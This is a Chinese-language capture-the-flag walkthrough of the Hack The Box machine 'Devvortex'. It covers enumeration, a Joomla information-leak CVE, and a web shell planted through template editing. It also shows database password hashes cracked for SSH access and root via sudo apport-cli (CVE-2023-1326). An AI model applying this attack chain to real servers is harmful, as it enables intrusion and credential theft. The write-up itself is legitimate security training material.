HTB，启动！

靶机地址：https://app.hackthebox.com/machines/Devvortex

user flag

nmap扫下：

Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-07 10:02 CST
Nmap scan report for 10.10.11.242 (10.10.11.242)
Host is up (0.62s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.67 seconds

是台linux机器，开了80端口。是个静态网站啥也没有。

dirsearch跑了一下，啥也没跑出来，出师不利，卡住了（

看了下wp，发现是子域名爆破，可以爆破出来dev.devvortex.htb，好吧。

然后dev.devvortex.htb也是个静态网站，没啥东西，再跑下目录看看，扫出来了robots.txt如下：

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html

User-agent: *
Disallow: /administrator/
Disallow: /api/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

然后还扫出来了README，看下README.txt，发现这个站点是个CMS：

Joomla! CMS™

1- Overview
	* This is a Joomla! 4.x installation/upgrade package.
	* Joomla! Official site: https://www.joomla.org
	* Joomla! 4.2 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_4.2_version_history
	* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/4.2-dev

2- What is Joomla?
	* Joomla! is a Content Management System (CMS) which enables you to build websites and powerful online applications.
	* It's a free and Open Source software, distributed under the GNU General Public License version 2 or later.
	* This is a simple and powerful web server application and it requires a server with PHP and either MySQL, PostgreSQL or SQL Server to run.
	You can find full technical requirements here: https://downloads.joomla.org/technical-requirements.

3- Is Joomla! for you?
	* Joomla! is the right solution for most content web projects: https://docs.joomla.org/Special:MyLanguage/Portal:Learn_More
	* See Joomla's core features - https://www.joomla.org/core-features.html
	* Try out our free hosting service: https://launch.joomla.org

4- How to find a Joomla! translation?
	* Repository of accredited language packs: https://downloads.joomla.org/language-packs
	* You can also add languages directly to your website via your Joomla! administration panel: https://docs.joomla.org/Special:MyLanguage/J4.x:Setup_a_Multilingual_Site/Installing_New_Language
	* Learn how to setup a Multilingual Joomla! Site: https://docs.joomla.org/Special:MyLanguage/J4.x:Setup_a_Multilingual_Site

5- Learn Joomla!
	* Read Getting Started with Joomla to find out the basics: https://docs.joomla.org/Special:MyLanguage/J4.x:Getting_Started_with_Joomla!
	* Before installing, read the beginners guide: https://docs.joomla.org/Special:MyLanguage/Portal:Beginners

6- What are the benefits of Joomla?
	* The functionality of a Joomla! website can be extended by installing extensions that you can create (or download) to suit your needs.
	* There are many ready-made extensions that you can download and install.
	* Check out the Joomla! Extensions Directory (JED): https://extensions.joomla.org

7- Is it easy to change the layout display?
	* The layout is controlled by templates that you can edit.
	* There are a lot of ready-made professional templates that you can download.
	* Check out the template management information: https://docs.joomla.org/Special:MyLanguage/Portal:Template_Management

8- Ready to install Joomla?
	* Check the minimum requirements here: https://downloads.joomla.org/technical-requirements
	* How do you install Joomla - https://docs.joomla.org/Special:MyLanguage/J4.x:Installing_Joomla
	* You could start your Joomla! experience building your site on a local test server.
	When ready it can be moved to an online hosting account of your choice.
	See the tutorial: https://docs.joomla.org/Special:MyLanguage/Installing_Joomla_locally

9- Updates are free!
	* Always use the latest version: https://downloads.joomla.org/latest

10- Where can you get support and help?
	* The Joomla! Documentation: https://docs.joomla.org/Special:MyLanguage/Main_Page
	* FAQ Frequently Asked Questions: https://docs.joomla.org/Special:MyLanguage/Category:FAQ
	* Find the information you need: https://docs.joomla.org/Special:MyLanguage/Start_here
	* Find help and other users: https://www.joomla.org/about-joomla/create-and-share.html
	* Post questions at our forums: https://forum.joomla.org
	* Joomla! Resources Directory (JRD): https://community.joomla.org/service-providers-directory/

11- Do you already have a Joomla! site that's not built with Joomla! 4.x ?
	* What's new in Joomla! 4.x: https://www.joomla.org/4
	* What are the main differences between 3.x and 4.x? https://docs.joomla.org/Special:MyLanguage/What_are_the_major_differences_between_Joomla!_3.x_and_4.x
	* How to migrate from 3.x to 4.x? Tutorial: https://docs.joomla.org/Special:MyLanguage/Joomla_3.x_to_4.x_Step_by_Step_Migration
	* How to migrate from 2.5.x to 3.x? Tutorial: https://docs.joomla.org/Special:MyLanguage/Joomla_2.5_to_3.x_Step_by_Step_Migration
	* How to migrate from 1.5.x to 3.x? Tutorial: https://docs.joomla.org/Special:MyLanguage/Joomla_1.5_to_3.x_Step_by_Step_Migration

12- Do you want to improve Joomla?
	* Where to request a feature? https://issues.joomla.org
	* How do you report a bug? https://docs.joomla.org/Special:MyLanguage/Filing_bugs_and_issues
	* Get Involved: Joomla! is a community developed software. Join the community at https://volunteers.joomla.org
	* Documentation for Developers: https://docs.joomla.org/Special:MyLanguage/Portal:Developers
	* Documentation for Web designers: https://docs.joomla.org/Special:MyLanguage/Web_designers

Copyright:
	* (C) 2005 Open Source Matters, Inc. <https://www.joomla.org>
	* Distributed under the GNU General Public License version 2 or later
	* See License details at https://docs.joomla.org/Special:MyLanguage/Joomla_Licenses

搜了下相关漏洞，发现一个CVE-2023-23752，是未授权访问漏洞，但是看起来好像执行不了啥命令：

但是有用户名、密码、数据库等敏感信息。

尝试ssh连接但是失败了，然后突然想到robots里面把目录都给列出来了，尝试找下后台，然后登陆：

登进后台之后就很容易拿shell了，常见进后台的操作就是找文件上传点 / 插件加载点 / 模板加载点 之类的常见功能，然后找到一个管理员的模板管理：

这个地方看起来可以改具体页面的php代码从而执行命令，测试一下把error.php改成phpinfo：

有戏，那直接上个🐴，然后蚁剑连：

这么简单就拿到了shell和web站点的adminstrator，最 好 搅 屎 的 一 集。

当前是www-data用户，没有访问用户flag的权限，还是老样子，得想办法搞到ssh的密码：

登进mysql一顿乱搜，这里用蚁剑不行，需要再弹个shell出来：

mysql> select username,password from sd4fg_users;
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| lewis    | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |
| logan    | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |
+----------+--------------------------------------------------------------+

hashcat跑一下：

拿到密码后ssh登录，可以拿到user flag：

root flag

查看特权指令：

logan@devvortex:~$ sudo -l
[sudo] password for logan:
Sorry, try again.
[sudo] password for logan:
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli

搜下这个apport-cli是啥东西，发现好像是个crash分析工具，然后找到了这个：https://github.com/diego-tella/CVE-2023-1326-PoC

首先先在本地创建一份crash文件，然后起个http server，用目标机器下载crash文件，随后加载文件，进入View report便可以成功提权：

成功提权：